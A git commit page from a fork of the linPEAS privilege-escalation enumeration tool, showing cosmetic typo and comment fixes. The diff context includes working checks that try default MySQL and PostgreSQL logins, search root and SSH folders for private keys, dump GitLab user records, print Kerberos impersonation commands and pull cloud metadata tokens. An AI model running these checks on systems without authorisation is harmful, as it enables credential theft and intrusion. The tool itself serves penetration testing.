darnellkeith/PEASS-ng
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #375 from galoget/master

Browse Source 
Fix typos, grammar and spacing
This commit is contained in:
Carlos Polop 2023-07-31 16:56:43 +02:00 committed by GitHub
commit 9861259bca
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 103 additions and 97 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
linPEAS/builder/linpeas_builder.py
View File

@ -6,12 +6,12 @@ from .src.yamlGlobals import FINAL_FAT_LINPEAS_PATH, FINAL_LINPEAS_PATH, TEMPORA
import os
import stat
#python3 -m builder.linpeas_builder
# python3 -m builder.linpeas_builder
def main():
# Load configuration
ploaded = PEASLoaded()
# Build temporary linpeas_base.sh file
# Build temporary linpeas_base.sh file
lbasebuilder = LinpeasBaseBuilder()
lbasebuilder.build()
@ -20,7 +20,7 @@ def main():
lbuilder.build()
lbuilder.write_linpeas(FINAL_FAT_LINPEAS_PATH)
lbuilder.write_linpeas(FINAL_LINPEAS_PATH, rm_startswith="FAT_LINPEAS")
os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file
os.remove(TEMPORARY_LINPEAS_BASE_PATH) # Remove the built linpeas_base.sh file
st = os.stat(FINAL_FAT_LINPEAS_PATH)
os.chmod(FINAL_FAT_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)
@ -30,4 +30,4 @@ def main():
if __name__ == "__main__":
main()
main()

6
linPEAS/builder/linpeas_parts/2_container.sh
View File

@ -16,7 +16,7 @@ containerCheck() {
containerType="docker\n"
fi
# Are we inside kubenetes?
# Are we inside kubernetes?
if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null ||
grep -qai kubepods /proc/self/cgroup 2>/dev/null; then
@ -257,7 +257,7 @@ else
if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi
fi
#If docker
# If docker
if echo "$containerType" | grep -qi "docker"; then
print_2title "Docker Container details"
inDockerGroup
@ -279,7 +279,7 @@ if echo "$containerType" | grep -qi "docker"; then
fi
fi
#If token secrets mounted
# If token secrets mounted
if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then
print_2title "Listing mounted tokens"
print_info "https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod"

16
linPEAS/builder/linpeas_parts/3_cloud.sh
View File

@ -150,9 +150,9 @@ if [ "$is_gcp" = "Yes" ]; then
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
# GCP Enumeration
if [ "$gcp_req" ]; then
print_2title "Google CLoud Platform Enumeration"
print_2title "Google Cloud Platform Enumeration"
print_info "https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security"
## GC Project Info
@ -236,7 +236,7 @@ if [ "$is_gcp" = "Yes" ]; then
fi
fi
# AWS ECS Enumeration
if [ "$is_aws_ecs" = "Yes" ]; then
print_2title "AWS ECS Enumeration"
@ -270,6 +270,7 @@ if [ "$is_aws_ecs" = "Yes" ]; then
fi
fi
# AWS EC2 Enumeration
if [ "$is_aws_ec2" = "Yes" ]; then
print_2title "AWS EC2 Enumeration"
@ -334,6 +335,7 @@ if [ "$is_aws_ec2" = "Yes" ]; then
fi
fi
# AWS Lambda Enumeration
if [ "$is_aws_lambda" = "Yes" ]; then
print_2title "AWS Lambda Enumeration"
printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
@ -346,6 +348,7 @@ if [ "$is_aws_lambda" = "Yes" ]; then
printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
fi
# AWS Codebuild Enumeration
if [ "$is_aws_codebuild" = "Yes" ]; then
print_2title "AWS Codebuild Enumeration"
@ -371,6 +374,7 @@ if [ "$is_aws_codebuild" = "Yes" ]; then
fi
fi
# DO Droplet Enumeration
if [ "$is_do" = "Yes" ]; then
print_2title "DO Droplet Enumeration"
@ -398,11 +402,12 @@ if [ "$is_do" = "Yes" ]; then
fi
fi
# IBM Cloud Enumeration
if [ "$is_ibm_vm" = "Yes" ]; then
print_2title "IBM Cloud Enumeration"
if ! [ "$IBM_TOKEN" ]; then
echo "Couldn't get the metdata token:("
echo "Couldn't get the metadata token:("
else
TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
@ -436,12 +441,13 @@ if [ "$is_ibm_vm" = "Yes" ]; then
fi
# Azure VM Enumeration
if [ "$is_az_vm" = "Yes" ]; then
print_2title "Azure VM Enumeration"
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
API_VERSION="2021-12-13" # https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
az_req=""
if [ "$(command -v curl)" ]; then

22
linPEAS/builder/linpeas_parts/7_software_information.sh
View File

@ -45,7 +45,7 @@ if [ "$MACPEAS" ]; then
done
fi
#-- SI) Mysql version
#-- SI) MySQL version
if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ]; then
print_2title "MySQL version"
mysql --version 2>/dev/null || echo_not_found "mysql"
@ -56,7 +56,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ];
echo ""
echo ""
#-- SI) Mysql connection root/root
#-- SI) MySQL connection root/root
print_list "MySQL connection using default root/root ........... "
mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
if [ "$mysqlconnect" ]; then
@ -65,7 +65,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ];
else echo_no
fi
#-- SI) Mysql connection root/toor
#-- SI) MySQL connection root/toor
print_list "MySQL connection using root/toor ................... "
mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
if [ "$mysqlconnect" ]; then
@ -74,7 +74,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ];
else echo_no
fi
#-- SI) Mysql connection root/NOPASS
#-- SI) MySQL connection root/NOPASS
mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
print_list "MySQL connection using root/NOPASS ................. "
if [ "$mysqlconnectnopass" ]; then
@ -85,7 +85,7 @@ if [ "$(command -v mysql)" ] || [ "$(command -v mysqladmin)" ] || [ "$DEBUG" ];
echo ""
fi
#-- SI) Mysql credentials
#-- SI) MySQL credentials
if [ "$PSTORAGE_MYSQL" ] || [ "$DEBUG" ]; then
print_2title "Searching mysql credentials and exec"
printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do
@ -144,7 +144,7 @@ peass{PostgreSQL}
#-- SI) PostgreSQL brute
if [ "$TIMEOUT" ] && [ "$(command -v psql)" ] || [ "$DEBUG" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
# Checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
else echo_no
@ -239,7 +239,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null)
privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null)
else
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) # If there is tons of files linpeas gets frozen here without a timeout
privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
fi
else
@ -352,8 +352,8 @@ if [ "$kadmin_exists" ] || [ "$klist_exists" ] || [ "$kinit_exists" ] || [ "$PST
printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do
if [ "$l" ] && echo "$l" | grep -q "@"; then
printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g"
#kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
#We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
# kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
# We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
fi
done
elif echo "$f" | grep -q krb5.conf; then
@ -533,7 +533,7 @@ fi
##-- SI) Gitlab
if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$PSTORAGE_GITLAB" ] || [ "$DEBUG" ]; then
print_2title "Searching GitLab related files"
#Check gitlab-rails
# Check gitlab-rails
if [ "$(command -v gitlab-rails)" ]; then
echo "gitlab-rails was found. Trying to dump users..."
gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
@ -546,7 +546,7 @@ if [ "$(command -v gitlab-rails)" ] || [ "$(command -v gitlab-backup)" ] || [ "$
echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
echo ""
fi
#Check gitlab files
# Check gitlab files
printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do
if echo $f | grep -q secrets.yml; then
echo "Found $f" | sed "s,$f,${SED_RED},"

28
linPEAS/builder/linpeas_parts/8_interesting_perms_files.sh
View File

@ -24,15 +24,15 @@ fi
suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
for s in $suids_files; do
s=$(ls -lahtr "$s")
#If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
# If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
if echo "$s" | grep -qE "^total"; then break; fi
sname="$(echo $s | awk '{print $9}')"
if [ "$sname" = "." ] || [ "$sname" = ".." ]; then
true #Don't do nothing
true # Don't do nothing
elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits)
echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
c="a"
@ -55,12 +55,12 @@ for s in $suids_files; do
$STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
sline_first="$(echo "$sline" | cut -d ' ' -f1)"
if echo "$sline_first" | grep -qEv "$cfuncs"; then
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
fi
else #If not a path
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then # Check if existing binary
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
fi
fi
@ -105,7 +105,7 @@ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sud
sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
for s in $sgids_files; do
s=$(ls -lahtr "$s")
#If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
# If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
if echo "$s" | grep -qE "^total";then break; fi
sname="$(echo $s | awk '{print $9}')"
@ -113,7 +113,7 @@ for s in $sgids_files; do
true #Don't do nothing
elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits)
echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
c="a"
@ -136,12 +136,12 @@ for s in $sgids_files; do
$STRINGS "$sname" | sort | uniq | while read sline; do
sline_first="$(echo $sline | cut -d ' ' -f1)"
if echo "$sline_first" | grep -qEv "$cfuncs"; then
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path
if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n"
fi
else #If not a path
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary
else # If not a path
if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then # Check if existing binary
printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
fi
fi
@ -456,7 +456,7 @@ fi
if ! [ "$IAMROOT" ]; then
print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
#In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
# In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
printf "%s\n" "$obmowbe" | while read entry; do
if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
@ -488,4 +488,4 @@ if ! [ "$IAMROOT" ]; then
fi
done
echo ""
fi
fi

10
linPEAS/builder/linpeas_parts/9_interesting_files.sh
View File

@ -11,7 +11,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then
for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do
if ! [ "$IAMROOT" ] && [ -O "$f" ]; then
echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED},"
elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits)
elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then # If write permision, win found (no check exploits)
echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else
echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},";
@ -80,14 +80,14 @@ find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/
echo ""
##-- IF) Writable log files
if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below
if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then # 3.18.0 and below
print_2title "Writable log files (logrotten) (limit 50)"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation"
logrotate --version 2>/dev/null || echo_not_found "logrotate"
lastWlogFolder="ImPOsSiBleeElastWlogFolder"
logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50)
printf "%s\n" "$logfind" | while read log; do
if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then # Only print info if something interesting found
if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
@ -164,7 +164,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then
SQLITEPYTHON=""
echo ""
printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then # If readable and filecmd and sqlite, or readable and not filecmd
if [ "$(command -v sqlite3 2>/dev/null)" ]; then
tables=$(sqlite3 $f ".tables" 2>/dev/null)
#printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
@ -186,7 +186,7 @@ if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then
else
columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
fi
#Check found columns for interesting fields
# Check found columns for interesting fields
INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
if [ "$INTCOLUMN" ]; then
printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"

84
linPEAS/builder/linpeas_parts/linpeas_base.sh
View File

@ -51,7 +51,7 @@ ITALIC="${C}[3m"
# --) SUPERFAST - FAST & do not search for special filaes in all the folders
if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi
FAST="1" #By default stealth/fast mode
FAST="1" # By default stealth/fast mode
SUPERFAST=""
DISCOVERY=""
PORTS=""
@ -68,9 +68,9 @@ EXTRA_CHECKS=""
REGEXES=""
PORT_FORWARD=""
THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")"
[ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2
[ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2
[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" #It THREADS is not a number, put number 2
[ -z "$THREADS" ] && THREADS="2" # If THREADS is empty, put number 2
[ -n "$THREADS" ] && THREADS="2" # If THREADS is null, put number 2
[ "$THREADS" -eq "$THREADS" ] 2>/dev/null && : || THREADS="2" # It THREADS is not a number, put number 2
HELP=$GREEN"Enumerate and search Privilege Escalation vectors.
${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors.
${GREEN} Checks:
@ -124,7 +124,7 @@ while getopts "h?asd:p:i:P:qo:LMwNDterf:F:" opt; do
e) EXTRA_CHECKS="1";;
r) REGEXES="1";;
f) SEARCH_IN_FOLDER=$OPTARG;
if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then #Make sure firmware folder ends with "/"
if ! [ "$(echo -n $SEARCH_IN_FOLDER | tail -c 1)" = "/" ]; then # Make sure firmware folder ends with "/"
SEARCH_IN_FOLDER="${SEARCH_IN_FOLDER}/";
fi;
ROOT_FOLDER=$SEARCH_IN_FOLDER;
@ -319,7 +319,7 @@ mounted=$( (cat /proc/self/mountinfo || cat /proc/1/mountinfo) 2>/dev/null | cut
if ! [ "$mounted" ]; then
mounted=$( (mount -l || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts) 2>/dev/null | grep "^/" | cut -d " " -f1 | tr '\n' '|')$(cat /etc/fstab 2>/dev/null | grep -v "#" | grep -E '\W/\W' | awk '{print $1}')
fi
if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi #Don't let any blacklist to be empty
if ! [ "$mounted" ]; then mounted="ImPoSSssSiBlEee"; fi # Don't let any blacklist to be empty
mountG="swap|/cdrom|/floppy|/dev/shm"
notmounted=$(cat /etc/fstab 2>/dev/null | grep "^/" | grep -Ev "$mountG" | awk '{print $1}' | grep -Ev "$mounted" | tr '\n' '|')"ImPoSSssSiBlEee"
mountpermsB="\Wsuid|\Wuser|\Wexec"
@ -329,7 +329,7 @@ rootcommon="/init$|upstart-udev-bridge|udev|/getty|cron|apache2|java|tomcat|/vmt
groupsB="\(root\)|\(shadow\)|\(admin\)|\(video\)|\(adm\)|\(wheel\)|\(auth\)"
groupsVB="\(sudo\)|\(docker\)|\(lxd\)|\(disk\)|\(lxc\)"
knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' #https://www.togaware.com/linux/survivor/Standard_Groups.html
knw_grps='\(lpadmin\)|\(cdrom\)|\(plugdev\)|\(nogroup\)' # https://www.togaware.com/linux/survivor/Standard_Groups.html
mygroups=$(groups 2>/dev/null | tr " " "|")
# Default Binaries List
@ -338,7 +338,7 @@ sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnomet
sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$"
sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$"
#Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION
# Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION
sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
/at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\
/abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22
@ -392,7 +392,7 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
/xscreensaver%Solaris_11.x\(CVE-2019-3010\)\
/xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\
/xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)"
#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|'
# To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|'
sidVB='peass{SUIDVB1_HERE}'
sidVB2='peass{SUIDVB2_HERE}'
cfuncs='file|free|main|more|read|split|write'
@ -428,7 +428,7 @@ for P in $ADDPATH; do
if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi
done
# test if sed supports -E or -r
# Test if sed supports -E or -r
E=E
echo | sed -${E} 's/o/a/' 2>/dev/null
if [ $? -ne 0 ] ; then
@ -460,13 +460,13 @@ if ! [ "$USER" ]; then
USER=$(whoami 2>/dev/null || echo -n "UserUnknown")
fi
if [ ! "$HOME" ]; then
if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home
if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; # Mac home
else HOME="/home/$USER";
fi
fi
Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|')
#This variables are dived in several different ones because NetBSD required it
# These variables are divided into several different ones because NetBSD requires that.
peass{VARIABLES}
